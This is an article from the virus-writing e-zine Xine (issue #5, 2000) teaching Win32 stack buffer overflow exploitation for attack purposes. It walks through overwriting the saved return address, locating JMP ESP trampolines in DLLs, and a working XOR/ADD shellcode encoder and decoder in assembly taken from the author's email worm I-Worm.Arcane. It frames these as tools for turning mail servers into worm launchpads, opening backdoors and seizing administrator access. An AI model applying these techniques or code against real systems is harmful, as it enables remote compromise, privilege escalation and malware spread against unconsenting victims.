Copy Link
Add to Bookmark
Report
Xine - issue #5 - Phile 116
Ú-----------------------------¿
| Xine - issue #5 - Phile 116 |
À-----------------------------Ù
------------------------------------------------------------------------
A Crash-course in <WIN32> Buffer Overflows
------------------------------------------------------------------------
Asmodeus iKX (c) 2000, xine#5
------------
Basics : Introduction
------------
"Anarchists of the world unite!,
Arsonists of the world, ignite!"
"In tranquil silence Peter sits meditating in his pitch black cellar room,
he's preparing for battle. The battlefield is not to be fought on this
side of the realm yet it requires full conciousness and awareness. He's a
highly ranked leader following the arcane "blacks arts". Slowly he
completes the trancesession and fully embraces his digital form. In
this realm he's known as Belzath an notorius virus coder responsible
for handful of highly sophisticated and "sucessful" viruses. Unlike
the companion by his side he dabbles with the forces of summoning, he
never actually do battle himself. He's like the ominous spider watching
silently from the safety of the darkness. His companion is a so called dark-
master and skilled hacker who unlike Belzath prefers open battle yet conceal-
ed. Todays course is on how to enslave the minds of unsuspecting enemies. The
hackers voice echoes in Belzath's head as it floats over enormous distances
in an instance "To know your enemy is to defeat your enemy", skillfully
the dark master forms an esquised web of creative power known as assembler.
"The core of creation is channeled through threads of the one power,
assembler!",
In lucid enlightment Belzath recieves the flow of experince the dark master
so friendly offers him, embraces it and slowly fades into the obscure
darkness of his study."
My lesson to you is how to enslave a processor and control it over any
distance. With the knowledge you obtain from reading this article you will
be able to transform an email server into a spawning pool for email worms
or maybe a virus launchpad, DoS minion the power lies in your hands. But
just because you possess the power doesn't mean you should abuse it, it's
your own decision and don't blame me if your actions get you in trouble.
A buffer overflow can also be exploited on a localmahine to obtain
administrator access. On NT workstations you often have a set of USER
and ADMINISTRATOR access levels. Some programs need to be installed with
ADMINISTRATOR access level and hence executes in that access level. If
you can snatch the EIP (exstended instruction pointer) from that program
you will also be able to perform actions in the ADMINISTRATOR access level
, the NT station is yours...
So what is a buffer overflow? Well the word describes the condition pretty good,
when a program stores an amount of data it could eighter save it in
precompiled static buffers in .DATA section of the program or it could use
dynamicaly allocated buffers on the stack (don't confuse this with global
and virtual memory that are allocated on RAM). Well so what is the stack?
It's memory BUT its a bit diffrent from ordinary memory. First of all it
is divided in arrays of DWORDs, that means you can't put a BYTE on stack.
Well ofcourse you could put for instance 01h on stack but it would be p-
added to 00000001h. What else should you know about the stack? Well
first of all it grows from higher memory addresses to lower, sort of from
roof to floor. When you put stuff on the stack you usually PUSH them on
the stack and when you fetch them back from the stack you POP them. You
should also be aware of how the data is stored on stack. Once again the
name is a give-away, the data is stored on stack like on "a stack" or pile
of paper. What you latest put on the stack you have to remove first to get
access to the paper below etc. This is called LIFO which means "Last-in-first
-out". Note that everything on the stack follows the big endian format which
means it's reversed. Well it's not really reversed, it's just a matter of
perspective :> the address 11223344h would look like this on stack
44332211h, see? The KERNEL32.DLL could be seen as the main chapter of a
book called "Night of the dead - Windows edition" when your program is
started it's called from within an API in windows (maybe
CreateProcessA?) and windows allocates a preset amount of stack which
is predefined in the PE-header (stack-commit, stack-reserve). ESP holds
the stack-pointer which points to the top of stack (remember, it grows
from roof to floor) usually HLL use EBP as a frame-pointer but virus coders
usally uses it as a delta offset pointer. Anyway when you call an API
or any other HLL routine for that matter a certain stack-frame will be
built. It is built in a process called "procedure prologue", basicly
it saved old EBP redirect EBP to ESP (EBP will be static as ESP is changed)
I'll tell you more about the appearance of the stack-frame later.
There is no real "universal rule" of how they should look like
but most HLL compilers build them in a certain way. Well actually you
can't avoid putting the return address on the stack-frame and parameters
etc but usually virus coders doesn't use EBP as a frame-pointer.
EBP is also known as Exstended BasePointer.
Well anyway as our "enemies" aren't virus coders who cares? :> Know your
enemy, remember? Ok so the return address and parameters are on the stack
what's next? Well the routine hopefully uses some kind of dynamic buffer and
"cuts" a hole in stack right below the saved EBP (I'll explain the structure
of the stack-frame later). Lets say the buffer holds 3 DWORDs (3*4) = 12
bytes, what happens if you sqeeze 24 bytes into the buffer?
A BUFFER OVERFLOW!!! You write past the buffer boundaries and into restricted
territory, BUT there are none there to guard the precious data and what is
also nice is that you can execute code on the stack it makes no diffrence,
cool! :> If you overflow the buffer correctly you can easily redirect
the return address and snatch EIP of the process E.G. the execution!
"To hold infinity in the palm of your hand and the processor in an hour."
------------
Goin' deeper : Chapter I
------------
(Primary objectives : Probing the area)
------------
Primary objectives : Probing the area
------------
So what about that stack-frame I was talking about, what does it look like
how is it built and what is it good for? Well this is how it is built
push 00000003h ; PUSH parameter 3 on stack
push 00000002h ; PUSH parameter 2 on stack
push 00000001h ; PUSH parameter 1 on stack
call function ; Return address is PUSHed on stack (OFFSET 00400300h)
;OFFSET 00400300h
ret ; Return to previous frame (KERNEL32.DLL API)
function proc local_var:DWORD
push ebp ; PUSH old EBP on stack
mov ebp,esp ; set EBP (base pointer->frame-pointer) so it points
; to stack-pointers current location.
sub esp,12d ; open stack buffer
; Perform some action
add esp,12d ; close stack buffer
pop ebp ; Restore old EBP from stack (previous frame-pointer)
ret ; RETURN to the return address on stack (next paper on
; the pile)
function endp
This is how it look like
Ú-----------------------------------------------¿
| Stack-frame graphical display |
| þ .......... ....... |
| þ Parameter3 4 bytes | OFFSET : 01000020d
| þ Parameter2 4 bytes | OFFSET : 01000016d
| þ Parameter1 4 bytes | OFFSET : 01000012d
| þ Return Address 4 bytes | OFFSET : 01000008d
| þ Old EBP 4 bytes | OFFSET : 01000004d
Ã-----------------------------------------------´
| þ Buffer 12 bytes | OFFSET : 01000000d
: :
ú ú
ú ú
You pushed the parameters on stack, called the routine, the call opcode
puts return address on stack and jumps to the address of function()
the function() performs a standard HLL "procedure prologue" which consists
in putting the current EBP on stack and then redirecting it to the
present ESP (stack-pointer) address. Our function() then digs a
12 byte hole in the stack for our buffer and later fills it again,
then restores old EBP from stack and performs a RET operation which
transfers control to the return address directly on stack (return
address sometimes AKA instruction address). Now you know how a stack-frame
looks like and how it is built and why. Btw EBP is used as a reference to
local variables and parameters.
------------
Chapter II
------------
(Primary objectives : Finding buffer overflow)
(Secondary objectives : Overrun buffer)
------------
Primary objectives : Finding buffer overflow
------------
To simplify things I'll use the buffer overflow condition and stack-frame
presented above. As a buffer can hold a specific amount of bytes/characters
you'll have to eighter disassemble the function and "manually" check
how large the buffer or you could find out by the "brute-force" aproach
which means you try by means of trial-and-error how large the buffer is.
Notice that a buffer overflow only accures if the buffer is unchecked. Some
APIs that are unchecked are lstrcpy, lstrcat and all HLL funcitons that
incorperate them or have their own unchecked boundaries such as gets(),
sprintf(), and vsprintf().
Here is a modified version of the procedure function() above. The full
source of this program is called BOAL.ASM and can be found in Xine#5
[Utilities section]
buffer_proc PROC parameter_1:DWORD
;int 3h
;set a break point in the program so you can
;study it in action if you don't want to find buffer overflow by
;means of trial-and-error.
push ebp
mov ebp,esp
mov esi,dword ptr [parameter_1] ; Pointer to memory address with NULL
; terminated string
sub esp,12d ; Size of buffer <-- Find this with method
mov edi,esp ; no 1.
stuff_it_in:
cmp byte ptr [esi],0 ; Check for NULL terminator
je found_copy_end ; IF found we're at end of string
cmp byte ptr [esi],0dh ; check for Line Feed
je found_copy_end ; IF found we're at end of string
cmp byte ptr [esi],0ah ; check for Carrier Return
je found_copy_end ; IF found we're at end of string
movsb ; Keep on movin baby :>
jmp stuff_it_in ; You know what time it is.
found_copy_end:
;int 3h
add esp,12d ; fix stack
pop ebp ; Get old EBP back
ret ; RETURN to saved Instruction pointer
buffer_proc endp
You call the above routine like this
lea eax,string_i_want_to_copy
push eax
call buffer_proc
In C it looks like this
ReturnVal = buffer_proc(mem_address);
Where mem_address is a 32-bit intiger pointing to a memory address containing
your NULL terminated string. You could use the function GetCommandLineA
to faster test diffrent string lenghts. You could also code a brute-forcer
that constantly feeds the buffer_proc() with diffrent lenght strings and
prints the string lenght that causes a access violation fault (requires a
SEH guard). Make sure you fill the buffer with values you will recognize in
HEX value. For instance if you fill it with "x" characters the EIP should
be redirected to the address 78787878h if it's entirely overwritten.
Examples of method no. 2 of finding buffer overflows in the BOAL.ASM file
boal.exe /x
<no result>
1 byte character
...
boal.exe /xxxxxxxxxxxxxxxx
<result = EBP = 78787878h>
16 bytes of character
boal.exe /xxxxxxxxxxxxxxxxxxxx
<result = EBP = 78787878h>
< EIP = 78787878h>
<Access violation at address 78787878h>
20 bytes of character
------------
Secondary objectives : Overrun buffer
------------
The EBP is first overwritten and then the EIP... Ok that makes sence lets
take a look at the stack-frame and how it looks after the overflow
Ú-----------------------------------------------¿
| Stack-frame graphical display |
| þ parameter_1 (87654321h) 4 bytes | OFFSET : 01000012d
| þ Return Address [xxxx] (78787878h) 4 bytes | OFFSET : 01000008d
| þ Old EBP [xxxx] (78787878h) 4 bytes | OFFSET : 01000004d
Ã-----------------------------------------------´
| þ Buffer [xxxxxxxxxxxx] (78h)*12 12 bytes | OFFSET : 01000000d
: :
ú ú
ú ú
If the buffer would have been larger we could have fitted some code into
it and redirected the return address to the start of the buffer. But
with 12 bytes we can't do very much :> so we will have to overwrite the
stack beyond the return address with our code. parameter_1 will be
overwritten but in that instance the parameter_1 has already been fetched
from stack, hopefully the routine won't use it anymore before the RET
opcode (operation code). We now encounter the first problem, if the
address we're going to redirect EIP to contains a NULL byte we won't be
able to have code beyond it as it will serve as a NULL terminator for the
string and might even screw up the new return address. So we have hit the
wall, what could be done!? To find the solution for this problem we must
start up the debuger and have a look at the state of the processor registers
at buffer overflow instance. Often ESP points to the start of the buffer
and EDI to the end of the buffer. If you find a register that points
somewhere inside the buffer we could fill the buffer with NOPs (0x90h)
and a jump instruction to the rest of hour code beyond the return address.
ESP can often be used as well, but how can a processor register value be
used!? Well we'll have to be smart, you're smart right? If so you should
have figured out by now how to perform the stack jump. For the less
fortunate I'll explain how ;> Btw of course you're smart, you downloaded
Xine#5 didn't you? Lets pretend ESP holds the address of the start of
the buffer and we have filled the buffer before old EBP and return address
with NOPs and a JMP 10 bytes beyond the return address. We now have to
find a memory address containing no NULL bytes that will perform a
JMP ESP or CALL ESP opcode. If you find a code sequence that does something
like this PUSH ESP;RET you can use it as well. If you don't know what
OS version or service pack that the software run on it could be difficult
to find a DLL that contains those bytes and always loads on same address
on all OS versions (NT 4.0/5.0 and Win9x). The best thing would be if
the program itself used DLLs that had the wanted opcode sequence at an
address without NULL bytes. To find the opcode sequence compile some code
that contains the opcode (JMP ESP for instance) then start your debuger
and check the hex value. NOP for instance has the hex value 90h, to find
a NOP opcode inside a DLL or program you could eighter use your debuger
or a hexeditor and search for the opcode. Softice has the command syntax
s (as in search) type HELP s for more info. Once you have found the
memory address that contains the wanted opcode and no NULL byte you can
use it as new return address in your exploit code. TIME OUT! I hope I
didn't lose you, lets go through it once more... If the stack address
we wanted to redirect the return address to contianed a NULL byte and the
buffer was to small to fit all of our code we have to perform a stack jump.
That means we have to find a processor register that points to a memory
address we can fill with code. Once we found such a register we must find
a memory address inside some DLL of the system that performs a JMP <REG>
or CALL <REG> where <REG> is the register containing the memory address
we wanted to redirect the return address to. Ok so we now have a memory
address that points to a JMP <REG> opcode and contains no NULL bytes
and <REG> points to our code...
------------
Chapter III
------------
(Primary objectives : Defeating bad opcode situation)
(Secondary objectives : Writing the payload)
------------
Primary objectives : Defeating bad opcode situation
------------
We have redirected the return address to our code, but our code has to
be intact for it to work... so why wouldn't it be intact? Well during
the buffer overflow it passes through a routine often an API or other
routine. So what? Well as buffer oveflows are common in string handling
routines that keeps copying/moving the string bytes until it hits a
NULL terminator. Some APIs also stop at CR or LF bytes (0dh, 0ah)
If your code contains any NULL bytes which it always does (well almost)
you will have to encrypt it. Best method is to combine XOR and ADD/SUB
encryption. I coded this encryption engine for I-Worm.Arcane which will
find an encryption scheme of XOR and ADD combinations that will produce
encryped code with no NULL/CR/LF characters.
call generate_decryptor
ret
generate_decryptor:
;int 3h
xor edx,edx
mov eax,arcane_total_size
add eax,1d
push eax
push edx
call_ arcane_GlobalAllocA
; Allocate arcane_total_size of bytes + 1 bytes of memory for the
; encrypted body.
mov dword ptr [ebp+arcane_cryptmem],eax
; save the memory address
call find_enc_keys
test eax,eax
je all_keys_bad
; check if we found an encryption scheme
;int 3h
mov byte ptr [ebp+xor_val],al
mov byte ptr [ebp+add_val],bl
; We found a scheme, and we save the values
all_keys_bad:
; eighter we found the keys or we found none :>
ret
find_enc_keys:
xor eax,eax
restart_search:
lea esi,[ebp+arcane_project]
mov edi,dword ptr [ebp+arcane_cryptmem]
mov ecx,arcane_total_size
cld
rep movsb
; Copy our code to the allocated memory
mov edi,dword ptr [ebp+arcane_cryptmem]
mov ecx,arcane_total_size
find_key:
inc eax
enc_body:
xor byte ptr [edi], al
inc edi
loop enc_body
; XOR encrypt it with the byte value in AL
mov edi,dword ptr [ebp+arcane_cryptmem]
mov ecx,arcane_total_size
check_if_valid_enc:
cmp al,255d
jae no_more_byte_key
loop_the_enc_body:
cmp byte ptr [edi],0
je found_invalid_byte
cmp byte ptr [edi],0ah
je found_invalid_byte
cmp byte ptr [edi],0dh
je found_invalid_byte
inc edi
loop loop_the_enc_body
jmp found_enc_key
; Check if code is valid or if it contains unwanted bytes
found_invalid_byte:
call test_adds
test ebx,ebx
je restart_search
found_enc_key:
ret
no_more_byte_key:
xor eax,eax
ret
test_adds:
xor ebx,ebx
find_add:
mov edi,dword ptr [ebp+arcane_cryptmem]
mov ecx,arcane_total_size
inc ebx
add_body:
add byte ptr [edi], bl
inc edi
loop add_body
; ADD encrypt the body (which already has a XOR layer)
mov edi,dword ptr [ebp+arcane_cryptmem]
mov ecx,arcane_total_size
check_if_valid_add:
cmp bl,255d
jae no_more_add_byte
loop_the_add_body:
cmp byte ptr [edi],0
je found_invalid_add
cmp byte ptr [edi],0ah
je found_invalid_add
cmp byte ptr [edi],0dh
je found_invalid_add
inc edi
loop loop_the_add_body
jmp found_add_key
; Check if code is valid or if it contains unwanted bytes
found_invalid_add:
mov edi,dword ptr [ebp+arcane_cryptmem]
mov ecx,arcane_total_size
sub_body:
sub byte ptr [edi], bl
inc edi
loop sub_body
jmp find_add
; Decrypt the body so we can check another ADD value
found_add_key:
ret
no_more_add_byte:
xor ebx,ebx
ret
;db "decryptor_start",0
decryptor_start:
xor eax,eax
xor ecx,ecx
jmp get_loc
got_loc:
pop esi
mov cx,arcane_total_size
xor_it:
sub byte ptr [esi],0h
add_val equ $-1
xor byte ptr [esi],0h
xor_val equ $-1
inc esi
loop xor_it
jmp encrypted_start
get_loc:
call got_loc
encrypted_start:
decryptor_end:
;db "decryptor ends here",0
decryptor_len equ $-offset decryptor_start
As the code of the decryptor can't contain any NULL bytes we have to code
it smart as well (as it can't be encrypted). To get offsets which contains
NULL bytes we must make use of the way CALL puts return address on stack
and POP it into a register. Maybe like this
jmp get_my_offset
got_it:
pop edi ; EDI = THIS OFFSET
; rest of our decryptor etc
get_my_offset:
call got_it
;THIS OFFSET
db "encrypted code here",0
We have the encrypted code in memory and have "generated" the decryptor
for the encrypted code. So what is next? the payload... we need some
code to be executed. Let your imagination flourish.
------------
Secondary objectives : Writing the payload
------------
Now you have control and your code can execute, what are you waiting for
do your work! Maybe open up a connection to the internet and download
some larger component, this is called an EGG procedure. You could also
open up a backdoor to the internet, or if you're on a localmachine you
could execute some batch file with commands you want to peform in the
higher access level. Or perform them yourself. If you're on an NT
machine (duh) you could start a command prompt (CMD.EXE) which will run
in higher access level as well as all you do in it. I won't explain how
to obtain the API address. Eighter you could fetch them from KERNEL32.DLL
export directory as you do in win32 viruses. You could also fetch them from
the import table of the program you're exploiting, but sometimes they
don't have all APIs you need. Then you should look for LoadLibrary and
GetProcAddress APIs in the import directory. I leave the rest to you
------------
Apendix
------------
NULL byte = NULL Terminator 0x00h
CR = Carrier Return 0x0dh
LF = Line Feed 0x0ah
Opcode = Operation code
EIP = Exstended Instruction Pointer
WORD = Two bute (2 bytes)
DWORD = Double word (4 bytes)
RAM = Random Access Memory (temporary storage [one boot-session])
HLL = Highlevel language (like C++, Delphi etc)